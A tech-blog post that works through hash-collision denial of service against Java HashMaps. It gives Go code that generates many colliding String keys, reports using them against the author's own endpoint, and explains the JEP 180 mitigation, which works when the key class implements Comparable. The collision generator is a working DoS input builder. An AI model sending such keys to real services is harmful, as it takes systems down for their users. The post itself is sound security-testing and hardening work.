Hash Collisions in Java

23.12.2021 | Carlo Götz

Recently I read an interesting article about hash collisions in Haskell’s Aeson library (used to parse JSON). Aeson uses HashMap to deal with JSON Objects. Using many colliding keys leads to a DoS. Generating colliding keys in Java is quite easy. How does Java mitigate this kind of problem? And why could I break our program anyway?

While trying to reproduce the behaviour we discovered JEP 180, why it did not work for us, and how to make it work.

Breaking our Program: Generating Collisions

We are using openjdk 11.0.12 2021-07-20. All source code snippets are taken from this tar ball.

JDK 11 uses two implementations to calculate hashCode for Strings. These are located in StringUTF16.java and StringLatin1.java.

We are looking at the latter:

// jdk-11.0.12-ga/src/java.base/share/classes/java/lang/StringLatin1.java:193
public static int hashCode(byte[] value) {
    int h = 0;
    for (byte v : value) {
        h = 31 * h + (v & 0xff);
    }
    return h;
}

Let’s start by generating some colliding Strings. I’m using Go here (fast startup times). Let’s try brute forcing with a length of 3.

First let’s implement Java’s hashCode:

func javaLatin1Hash(s string) int32 {
    var result int32
    for i := 0; i < len(s); i++ {
        result = 31*result + int32((s[i] & 0xff))
    }
    return result
}

Now we generate all permutations of Strings with length 3 given an alphabet (ASCII only):

const (
    n        = 3.0
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
)

func genStrings() []string {
    wordsLen := int(math.Pow(float64(len(alphabet)), n))
    words := make([]string, 0, wordsLen)

    for i := 0; i < len(alphabet); i++ {
        for j := 0; j < len(alphabet); j++ {
            for k := 0; k < len(alphabet); k++ {
                word := []byte{alphabet[i], alphabet[j], alphabet[k]}
                words = append(words, string(word))
            }
        }
    }

    return words
}

Calculate the hash for each String and find a hash with the maximum number of collisions:

func maxCollisions(words []string) []string {
    m := make(map[int32][]string)
    for _, w := range words {
        h := javaLatin1Hash(w)
        m[h] = append(m[h], w)
    }
    max := 0
    var maxK int32
    for k, v := range m {
        l := len(v)
        if l > max {
            max = l
            maxK = k
        }
    }
    return m[maxK]
}

Executing this gives us some colliding Strings:

[1ot 1pU 1q6 2Pt 2QU 2R6 31t 32U 336]

Sadly these are far too few to DoS a HashMap. My first solution would generate all Strings with a length of 1..n and n could be adjusted. This works for n up to 4. When n was increased to 5 my machine ran out of memory (64GB). We need another solution, so let’s look at the hash function again:

// jdk-11.0.12-ga/src/java.base/share/classes/java/lang/StringLatin1.java:193
public static int hashCode(byte[] value) {
    int h = 0;
    for (byte v : value) {
        h = 31 * h + (v & 0xff);
    }
    return h;
}

We can see that the hash of a String s, consisting of two substrings s1 and s2 is just hash(s)=31^(len(s2)) * hash(s1) + hash(s2). So if we concatenate two Strings with the same hash and same length we get the same result, regardless of order.

Let’s look at an example (31^2 means 31 squared):

"ABC".hashCode() == 31 * 31 * 'A' + 31 * 'B' + 'C'
"DE".hashCode() == 31 * 'D' + 'E'
"ABCDE".hashCode() == 31^4 * 'A' + 31^3 * 'B' + 31^2 * 'C' + 31 * 'D' + 'E'
== 31^2 * (31^2 * 'A' + 31 * 'B' + 'C') + (31 * 'D' + 'E')
== 31^len("DE") * "ABC".hashCode() + "DE".hashCode()

This allows us to generate more colliding Strings by just concatenating what we have. We can do this in a loop until we reach some minimum number of colliding Strings:

func genCollisions(minCollisions int) []string {
    strs := genStrings()
    someCollisions := maxCollisions(strs)
    moreCollisions := make([]string, len(someCollisions))
    copy(moreCollisions, someCollisions)
    for len(moreCollisions) < minCollisions {
        for _, s1 := range moreCollisions {
            for _, s2 := range someCollisions {
                moreCollisions = append(moreCollisions, s1+s2)
            }
        }
    }
    return moreCollisions
}

Now that we can generate many colliding Strings, let’s see what happens when we insert them into a HashMap.

I used these keys to attack an endpoint of our software Cadenza. The attack was successful: all CPU cores at 100%, no termination in sight. Our program is broken.

Comparing a Minimal Proof of Concept to our Application

I started writing this blog post and told some of my friends about my findings. This piqued the interest of one friend in particular: Tom Ganz. He tried to reproduce this against just a HashMap<String, String> and couldn’t.

Why is our application vulnerable?

The minimal proof of concept that Tom created boils down to:

Map<String, String> m = new HashMap<>();
for (var c : generateCollisions()) {
    m.put(c, null);
}

This terminates even with 16e6 keys in a short amount of time. So what’s the difference to our application?

The endpoint under attack basically did something very similar but different. Instead of a String key a small wrapper class around a String was used (for improved type safety):

class FooName {
  private final String name;
  FooName(String name) { this.name = name; }

  @Override
  public boolean equals(Object o) {
    // do the type equality thing
    return name.equals(o.name);
  }

  @Override
  public int hashCode() {
    return name.hashCode();
  }
}

Our first hunch was that the custom class plays a role, so Tom adjusted his proof of concept using such a wrapper class. The results were the same as with our application: inserting a large amount of colliding keys led to a basically unusable program.

So why are HashMaps with String keys not susceptible to collisions but wrapper classes are?

JEP 180 - Handle Frequent HashMap Collisions with Balanced Trees

The answer is quite simple: JEP 180 changed the HashMap implementation to use a balanced tree instead of a linked list when there are many colliding keys. This changes the complexity of searching a key in a bucket from O(n) to O(log n). The tree variant used is a Red-Black-Tree.

In order for this to work the class used for the key has to implement Comparable. Otherwise we don’t know how to build a tree from the keys. By adding a Comparable implementation to the class FooName we can take advantage of JEP 180. Thus making our program resilient against hash collisions again:

class FooName implements Comparable<FooName> {
  // same as before

  @Override
  public int compareTo(FooName o) {
    return this.name.compareTo(o.name);
  }
}

Conclusion: When you put user defined, unrestricted inputs into a HashMap ensure that the key implements Comparable.

The title image by Nomen4Omen depicting a Red Black Tree is published under the CC BY-SA 4.0 license and was used without modifications.

« The Apache Sedona Minimal Environment depgrapher: Fast Dependency Analysis for Javascript »

Disy Tech-Blog

Hash Collisions in Java

Breaking our Program: Generating Collisions

Comparing a Minimal Proof of Concept to our Application

JEP 180 - Handle Frequent HashMap Collisions with Balanced Trees